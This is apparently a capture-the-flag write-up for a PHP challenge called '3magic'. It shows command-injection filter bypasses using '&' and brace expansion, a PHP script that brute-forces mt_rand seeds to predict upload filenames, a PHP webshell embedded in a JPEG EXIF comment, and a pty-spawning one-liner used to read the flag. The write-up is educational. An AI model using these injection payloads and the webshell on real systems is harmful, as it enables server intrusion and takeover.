







We’re directed to a web application that lets us ping an arbitrary host. Like
many such web interfaces, this one is vulnerable to command injection. We can
provide flags like `-v` to get the version of ping being used, but inserting
other characters, like `|`, `;`, or `$()`, results in a response of
`invalid character detected`. Notably, so do spaces and tabs, which
significantly limits our ability to run commands (we’ll see how to get around
this shortly).

I spent some time testing various characters and discovered that neither
ampersands nor newlines were included in the filter set, so these could be used
to separate commands. I could quickly list the files in the current directory
with `&ls`, but couldn’t figure out a way to traverse directories.

    files
    index.php
    pages

One of my teammates discovered that you could use brace expansion to add
command arguments, so `&{ls,pages}` lets us list the `pages` directory:

    Adm1n1sTraTi0n2.php
    ping.php
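Brace expansion helps here because bash turns `{a,b}` into the separate words `a b` before running the command, and `{`, `}`, and `,` evidently get past the filter. As a rough sketch, the payload and the resulting shell command can be put together as follows. The helper names `brace_payload` and `server_command` are made up for illustration, and the command template is the one that appears in the `ping.php` source later in this post.

```python
def brace_payload(argv):
    """Build an injection string that runs argv without using spaces.

    bash only performs brace expansion when the braces contain at least
    one comma, so a lone command such as ["ls"] is sent as plain "&ls".
    """
    if len(argv) == 1:
        return "&" + argv[0]
    return "&{" + ",".join(argv) + "}"


def server_command(addr):
    """Return the shell command the server builds for a given addr value."""
    return "timeout 2 bash -c 'ping -c 1 %s' 2>&1" % addr


if __name__ == "__main__":
    for argv in (["ls"], ["ls", "pages"], ["grep", "-Hr", ".", "."]):
        payload = brace_payload(argv)
        # The "&" backgrounds the (failing) ping, then bash runs our command.
        print(len(payload), payload, "->", server_command(payload))
```

The printed length matters because the application also limits how long `addr` may be.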

`Adm1n1sTraTi0n2.php` looks interesting, but I’d really like to see the source.
Several attempts to get the source result in an error of `addr is too long`,
which seems to occur once the input exceeds 15 characters. Eventually, we hit
upon the idea of using the command `grep -Hr . .` to grep for every line of
every file in the current directory and below. This looks like
`&{grep,-Hr,.,.}` and gives us the source of every file we’re looking at
(though not in a very pretty format). I’ve cleaned them up below.
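Part of that cleanup can be scripted. The sketch below assumes the raw response has already been saved as text and that match lines look like `./path:content`, which is what `grep -H` prints when searching `.`; the function name `split_grep_output` is my own. Because the pattern `.` needs at least one character, blank source lines never show up in the output and cannot be recovered this way.

```python
def split_grep_output(text):
    """Group `grep -Hr . .` output lines of the form ./path:content by path."""
    files = {}
    for line in text.splitlines():
        if not line.startswith("./"):
            continue  # skip anything that is not a match line, e.g. ping errors
        path, sep, content = line.partition(":")
        if not sep:
            continue
        files.setdefault(path, []).append(content)
    return files


if __name__ == "__main__":
    sample = "\n".join([
        "ping: usage error: Destination address required",
        "./index.php:<html>",
        "./index.php:<head>",
        "./pages/ping.php:<p>ping</p>",
    ])
    for path, lines in split_grep_output(sample).items():
        print("==", path)
        print("\n".join(lines))
```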

index.php

    <html>
    <head>
    <title>3magic</title>
    <body>
    <li>
        <a href='?page=ping'>ping</a>
    </li>
    <?php
    if ($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
    ?>
    <li>
        <a href='?page=???'>admin</a>
    </li>
    <?php
    }
    ?>
    <hr>
    <?php
    if (isset($_GET['page'])) {
        $p = $_GET['page'];
        if (preg_match('/(:\/\/)/', $p)) {
            die('attack detected');
        }
        include("pages/".$p.".php");
        die();
    }
    ?>
    </body>
    </html>
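To make the include logic easier to reason about, here is a small Python mirror of it. It is only a model of the PHP above: `include_target` is a name I made up, and `../files/123_shell` is a hypothetical page value, not something taken from the challenge. The point it illustrates is that the check only rejects `://`, so stream wrappers are blocked, while `.php` is always appended to whatever is requested.

```python
import posixpath


def include_target(page):
    """Mirror index.php: reject '://' and wrap the value as pages/<page>.php."""
    if "://" in page:
        raise ValueError("attack detected")
    return "pages/" + page + ".php"


if __name__ == "__main__":
    for page in ("ping", "Adm1n1sTraTi0n2", "../files/123_shell"):
        target = include_target(page)
        # normpath shows where a relative path would end up on disk.
        print(page, "->", target, "->", posixpath.normpath(target))
    try:
        include_target("php://filter/resource=index")
    except ValueError as err:
        print("rejected:", err)
```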

ping.php

    <p>ping</p>
    <form action="./?page=ping" method="POST">
        <input type="text" name="addr" placeholder="addr">
        <input type="submit" value="send">
    </form>
    <textarea style="width: 300px; height: 300px" placeholder="result">
    <?php
    if (isset($_POST['addr'])) {
        $addr = $_POST['addr'];
        if (preg_match('/[`;$()| \/\'>"\t]/', $addr)) {
            die("invalid character detected");
        }
        if (strpos($addr, ".php") !== false){
            die("invalid character detected");
        }
        if (strlen($addr) > 15) {
            die("addr is too long");
        }
        @system("timeout 2 bash -c 'ping -c 1 $addr' 2>&1");
    }
    ?>
    </textarea>
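With the source in hand, candidate payloads can be checked offline before sending them. The following is a minimal Python sketch of the three checks in `ping.php`, in the same order; `rejection_reason` is a hypothetical helper name. Note that PHP's `strlen` counts bytes while Python's `len` counts characters, so the two agree only for ASCII input.

```python
import re

# Same character class as the preg_match() call in ping.php:
# backtick ; $ ( ) | space / ' > " and tab.
BLOCKED = re.compile(r"""[`;$()| /'>"\t]""")
MAX_LEN = 15


def rejection_reason(addr):
    """Return the error ping.php would print for addr, or None if it passes."""
    if BLOCKED.search(addr):
        return "invalid character detected"
    if ".php" in addr:
        return "invalid character detected"
    if len(addr) > MAX_LEN:
        return "addr is too long"
    return None


if __name__ == "__main__":
    candidates = ["-v", "&ls", "&{ls,pages}", "&{grep,-Hr,.,.}",
                  "a;ls", "&{cat,index.php}", "&{grep,-Hr,.,..}"]
    for addr in candidates:
        print(repr(addr), "->", rejection_reason(addr) or "passes")
```

This also shows why `&{grep,-Hr,.,.}` was such a good fit: it is exactly 15 characters long and never mentions `.php`.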

Adm1n1sTraTi0n2.php

    <p>image inspector</p>
    <?php
    mt_srand((time() % rand(1,10000) + rand(2000,5000))%rand(1000,9000)+rand(2000,5000));
    // files directory flushed every 3min
    setcookie('test', mt_rand(), time(), '/');
    if (isset($_POST['submit'])) {
        $check = getimagesize($_FILES['file']['tmp_name']);
        if($check !== false) {
            echo 'File is an image - ' . $check['mime'];
            $filename = '/var/www/html/3magic/files/'.mt_rand().'_'.$_FILES['file']['name']; // prevent path traversal
            move_uploaded_file($_FILES['file']['tmp_name'], $filename);
            echo "<br>\n";
            system('/usr/bin/file -b '.escapeshellarg($filename));
            echo "<br>\n";
        } else {
            echo "File is not an image";
        }
    }
    ?>
    <form action="?page=Adm1n1sTraTi0n2" method="post" enctype="multipart/form-data">
        Select image to upload:
        <input type="file" name="file">
        <input type="submit" value="Upload Image" name="submit">
    </form>

So, we have a file upload with validation to test whether the upload is, in
fact, an image. (`getimagesize` is pretty hard to fake.) We can upload arbitrary
files, but I wasn’t sure we could get them included, given the `://` check on
the include in `index.php` and the `.php` suffix it appends. There’s also the
small matter of predicting the value of `mt_rand()` used in the filename. On
second glance, I realized there’s nothing stopping us from uploading a file
whose extension is `.php`, but there’s still the matter of `mt_rand()`. It
actually took me several minutes before I noticed the cookie being set, leaking
a value from `mt_rand()`. I knew `mt_rand` isn’t secure and should be
predictable, but I wasn’t sure how to do it.

It turns out there’s a tool out there to find the seed from a returned value of
`mt_rand`, but it takes about 10 minutes on my laptop. I realized the
`mt_srand` call used to seed `mt_rand` looked a little bit funny with all the
math. Working it through, I realized that, rather than a full 2**32 range for
the seed, the entire working range is only between 2000 and 13999: the final
`% rand(1000,9000)` leaves at most 8999, and the last `rand(2000,5000)` adds
between 2000 and 5000. With a range this small, a short PHP script was a better
option for working out the next `mt_rand` value:

    <?php
    // Argument: the mt_rand() value leaked in the "test" cookie.
    $leaked = (int)$argv[1];
    // Try every seed the mt_srand() expression can produce.
    for ($i = 2000; $i <= 13999; $i++) {
        mt_srand($i);
        if (mt_rand() == $leaked) {
            // The next output is the number used in the uploaded file's name.
            print mt_rand();
            print "\n";
            break;
        }
    }
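The bound on the seed follows from the two outermost operations alone: whatever the inner expression evaluates to, `x % rand(1000,9000)` lies between 0 and 8999, and the final `rand(2000,5000)` adds between 2000 and 5000. A quick sanity check in Python, as a sketch only: `random.randint` stands in for PHP's `rand()`, and the timestamp is an arbitrary value chosen for the demo.

```python
import random


def seed_bounds():
    """Bounds of (t % r1 + r2) % r3 + r4 for the rand() ranges in the source."""
    r3_max = 9000
    r4_min, r4_max = 2000, 5000
    # x % r3 is always in [0, r3 - 1], whatever time(), r1 and r2 are.
    return 0 + r4_min, (r3_max - 1) + r4_max


def sample_seed(now):
    """One draw of the seed expression for a given Unix timestamp."""
    r1 = random.randint(1, 10000)
    r2 = random.randint(2000, 5000)
    r3 = random.randint(1000, 9000)
    r4 = random.randint(2000, 5000)
    return (now % r1 + r2) % r3 + r4


if __name__ == "__main__":
    lo, hi = seed_bounds()
    seeds = [sample_seed(1462000000) for _ in range(100000)]
    # Every sampled seed must fall inside the derived bounds.
    assert lo <= min(seeds) and max(seeds) <= hi
    print("seed range:", lo, "to", hi, "candidates:", hi - lo + 1)
```

With only about twelve thousand candidates, trying every seed is far cheaper than a general-purpose seed cracker.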

With this tool, I was able to predict full filenames and could upload images
with the extension `.php`. To get code execution, I added
`<?PHP passthru($_GET['x']); ?>` as the EXIF comment in a JPEG image and
uploaded it as a `.php` file. I was quickly able to confirm that both my script
and the embedded PHP worked by listing the directory.
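For reference, this is how the predicted number turns into a path. The upload directory and the `<mt_rand>_<name>` pattern come straight from `Adm1n1sTraTi0n2.php`; the document root of `/var/www/html` is my assumption, as are the helper names and the example values. Since `mt_srand` runs on every request, the leaked cookie and the filename have to come from the same upload request: the cookie carries the first `mt_rand()` output and the filename uses the second.

```python
import posixpath

UPLOAD_DIR = "/var/www/html/3magic/files/"  # from Adm1n1sTraTi0n2.php
DOC_ROOT = "/var/www/html"                  # assumption, not shown in the source


def predicted_path(next_rand, upload_name):
    """Filesystem path the upload handler would write to."""
    return UPLOAD_DIR + str(next_rand) + "_" + upload_name


def predicted_url_path(next_rand, upload_name):
    """URL path of the uploaded file, relative to the assumed document root."""
    path = predicted_path(next_rand, upload_name)
    return "/" + posixpath.relpath(path, DOC_ROOT)


if __name__ == "__main__":
    # 1234567 and shell.php are placeholder values for the demo.
    print(predicted_path(1234567, "shell.php"))
    print(predicted_url_path(1234567, "shell.php"))
```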





Now, to find the flag. It wasn’t in the working directory or the document root,
so I checked the root of the filesystem and found a file named `flag`. It was
only readable by the user `flag`, though, and I was running as `www-data`.
There was also a program, `/read_flag`, but calling it from my PHP shell
resulted in a segmentation fault. So I started a shell with netcat and tried
from there. Still a segmentation fault. Maybe it needed a pty? Fortunately,
there’s a nice Python one-liner to allocate a pseudo-terminal:
`python -c "import pty;pty.spawn('/bin/bash')"`. Running `/read_flag` from this
point gave results:

    www-data@web-tasks:~/html/3magic/files$ /read_flag
    /read_flag
    Write "*please_show_me_your_flag*" on my tty, and I will give you flag :)
    *please_show_me_your_flag*
    *please_show_me_your_flag*
    ASIS{015c6456955c3c44b46d8b23d8a3187c}
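I never saw the source of `/read_flag`, so the following is only a guess at why the pty mattered: a shell hanging off a pipe or a netcat socket has no terminal device, and a program that looks up "its tty" without checking for failure could plausibly crash. The sketch below just demonstrates the difference between the two kinds of file descriptor on a Unix-like system; `tty_report` is a made-up helper name.

```python
import os
import pty


def tty_report():
    """Compare a plain pipe with a pseudo-terminal, as a child would see them."""
    read_end, write_end = os.pipe()
    master, slave = pty.openpty()
    try:
        return {
            "pipe": os.isatty(write_end),     # what a pipe-backed shell gets
            "pty": os.isatty(slave),          # what pty.spawn() hands the child
            "pty_name": os.ttyname(slave),    # the terminal device path
        }
    finally:
        for fd in (read_end, write_end, master, slave):
            os.close(fd)


if __name__ == "__main__":
    for key, value in tty_report().items():
        print(key, "=", value)
```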